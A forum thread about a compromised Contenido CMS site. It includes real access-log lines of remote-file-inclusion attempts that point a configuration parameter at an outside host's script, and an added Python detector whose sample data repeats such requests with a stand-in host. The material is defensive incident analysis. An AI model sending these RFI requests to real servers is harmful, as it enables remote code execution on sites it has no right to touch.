205.234.219.245 - - [08/Jun/2008:08:08:06 +0200] "GET /cms/klemm/cms//contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 403 "-" "libwww-perl/5.805"
205.234.219.245 - - [08/Jun/2008:08:08:08 +0200] "GET //contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 388 "-" "libwww-perl/5.805"
205.234.219.245 - - [08/Jun/2008:08:08:20 +0200] "GET /cms/klemm//contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 200 - "-" "libwww-perl/5.805"
89.218.85.18 - - [08/Jun/2008:15:33:38 +0200] "GET /cms/klemm/cms//contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 403 "-" "libwww-perl/5.805"
89.218.85.18 - - [08/Jun/2008:15:33:38 +0200] "GET //contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 388 "-" "libwww-perl/5.805"
89.218.85.18 - - [08/Jun/2008:15:33:38 +0200] "GET /cms/klemm//contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 200 - "-" "libwww-perl/5.805"
62.140.19.142 - - [08/Jun/2008:15:37:00 +0200] "GET /cms/klemm/cms//contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 403 "-" "libwww-perl/5.76"
62.140.19.142 - - [08/Jun/2008:15:37:00 +0200] "GET //contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 388 "-" "libwww-perl/5.76"
62.140.19.142 - - [08/Jun/2008:15:37:00 +0200] "GET /cms/klemm//contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 200 - "-" "libwww-perl/5.76"
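An added example (not code from the thread or from Contenido) that does what tono and Dodger77 suggest: it parses access-log lines in the format quoted above, flags requests whose query parameter value is a remote URL, groups them per source IP, and also audits the php_flag lines Martin quoted for the settings that make such requests dangerous. The IPs, hostnames and log lines in it are constructed.

```python
"""Added example (not code from the forum thread or from Contenido): flag
remote-file-inclusion (RFI) attempts in Apache combined-format access logs and
audit the php_flag lines of an .htaccess for the settings that let them work.
The request pattern is the one the thread shows: a query parameter such as
cfg[path][contenido] whose value is an absolute URL, sent by a scanner."""
import re
from urllib.parse import parse_qsl

# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# A parameter value that is itself an absolute URL is the RFI signature: with
# register_globals on, ?cfg[path][contenido]=http://... overwrites $cfg before
# the script does include($cfg['path']['contenido'] . 'somefile.php').
REMOTE_VALUE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Settings that are dangerous when "on". register_globals and display_errors are
# PHP_INI_PERDIR (an .htaccess can turn them off); allow_url_* are php.ini only.
RISKY_ON = {
    'register_globals': 'URL parameters overwrite PHP variables such as $cfg',
    'allow_url_fopen': 'fopen()-style calls (and include() before PHP 5.2) fetch http:// URLs',
    'allow_url_include': 'include()/require() fetch http:// URLs (PHP >= 5.2)',
    'display_errors': 'error output leaks paths and versions to the scanner',
}

def parse_line(line):
    """Split one access-log line into its fields; None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def rfi_params(target):
    """[(name, value)] for query parameters whose value is a remote URL."""
    query = target.partition('?')[2]
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if REMOTE_VALUE_RE.match(v)]

def scan_log(text):
    """One finding per request carrying a remote URL in a query parameter.
    A 200 only shows the targeted script exists and ran; whether the remote
    file was actually fetched must be checked on the server itself."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, value in rfi_params(rec['target']):
            findings.append({
                'ip': rec['ip'], 'time': rec['time'],
                'script': rec['target'].partition('?')[0],
                'param': name,
                # scanners append "?" so the remaining include path becomes a query string
                'url': value.rstrip('?'),
                'status': rec['status'], 'ua': rec['ua'],
                'script_ran': rec['status'] == '200',
            })
    return findings

def summarize(findings):
    """Per source IP: attempts, whether any hit an existing script, URLs used."""
    by_ip = {}
    for f in findings:
        s = by_ip.setdefault(f['ip'], {'attempts': 0, 'script_ran': False, 'urls': set()})
        s['attempts'] += 1
        s['script_ran'] = s['script_ran'] or f['script_ran']
        s['urls'].add(f['url'])
    return by_ip

def audit_htaccess(text):
    """[(setting, why)] for php_flag/php_value lines that switch a risky setting on."""
    findings = []
    for line in text.splitlines():
        m = re.match(r'^\s*php_(?:flag|value)\s+(\S+)\s+(\S+)', line)
        if m and m.group(1).lower() in RISKY_ON and m.group(2).lower() in ('on', '1', 'true'):
            findings.append((m.group(1).lower(), RISKY_ON[m.group(1).lower()]))
    return findings

# Constructed sample data (documentation IPs, .invalid hostname): two scanner requests,
# the second hitting an existing script (200), and one ordinary page view not to flag.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jun/2008:04:53:47 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://scanner.invalid/id.txt??? HTTP/1.1" 404 402 "-" "libwww-perl/5.811"
192.0.2.10 - - [01/Jun/2008:04:53:48 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://scanner.invalid/id.txt??? HTTP/1.1" 200 - "-" "libwww-perl/5.811"
198.51.100.7 - - [02/Jun/2008:10:12:03 +0200] "GET /cms/klemm/cms/front_content.php?idcat=3&lang=1 HTTP/1.1" 200 10304 "-" "Mozilla/5.0 (X11; Linux) Firefox/2.0"
"""
# The five flags quoted in the thread, as an .htaccess would contain them.
SAMPLE_HTACCESS = """\
php_flag magic_quotes_gpc on
php_flag register_long_arrays on
php_flag display_errors on
php_flag register_globals on
php_flag allow_call_time_pass_reference on
"""

if __name__ == '__main__':
    print(summarize(scan_log(SAMPLE_LOG)))
    print(audit_htaccess(SAMPLE_HTACCESS))
```

Run it against a real access_log by reading the file into scan_log; the per-IP summary tells you which sources reached an existing script, which is where to start comparing files against the backup.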

Posted: Tue 10 Jun 2008, 11:11
by boeckers
Hi Martin,

that looks like the old deep-link attack.

Maybe download the conubo-HTA.lite for Contenido from my site www.conubo.net and run it.
The download is free.

It creates .htaccess files, which is meant to prevent such deep-link attacks.

Especially for protecting older installations this is often quite helpful.

Regards

boeckers

Posted: Tue 10 Jun 2008, 11:11
by Martin S.
Then I also saw a log entry with constant calls of a JS file

cms/js/jsApi.js

That isn't part of the system's standard, is it?!

And do all the directories actually have to be set to 777, or can I restrict that? Once I've done that and put the backups back over it, I'll run the htaccess files over it afterwards. Thanks, and if you have any more tips, I'd welcome them.

Posted: Tue 10 Jun 2008, 11:47
by tono
You should study this subforum carefully; there are many more hints and tips there.

Whether the directories have to be 777 or not depends heavily on the system. Just try it out; in this case less is more after all!

Posted: Tue 10 Jun 2008, 12:04
by Dodger77
Martin S. wrote: Then I also saw a log entry with constant calls of a JS file

cms/js/jsApi.js

That isn't part of the system's standard, is it?!
No, but it is called in the standard layout. That call can simply be removed from the HTML. It probably has nothing to do with the hack.

Posted: Tue 10 Jun 2008, 12:10
by Martin S.
Ah yes, right, now I remember, so it probably wasn't the js then. In any case the provider is restoring the old backups and afterwards I'll run the HTA thing over it; hopefully the worst will be plugged then, thanks to you.

Posted: Tue 10 Jun 2008, 12:36
by Dodger77
Martin S. wrote: ..., hopefully the worst will be plugged then, ...
What's important is to compare the backups and the current state with each other (e.g. with Winmerge) to find out what really caused it. The attack attempts in the log files above should actually not be successful in Contenido versions from 4.6.8 onwards.

Posted: Tue 10 Jun 2008, 12:48
by Martin S.
Thanks for the hint, but I can't compare anything, because the files were all deleted again on their own; all I have left are empty directories.

cms/
cache
css
js
logs
templates
upload

contenido/
cronjobs
logs

Otherwise I see nothing, and the log files don't really say much either, or at least I don't really understand the entries.

Oh, and as already described above, the versions ranged from 4.6.8 to 4.8.2.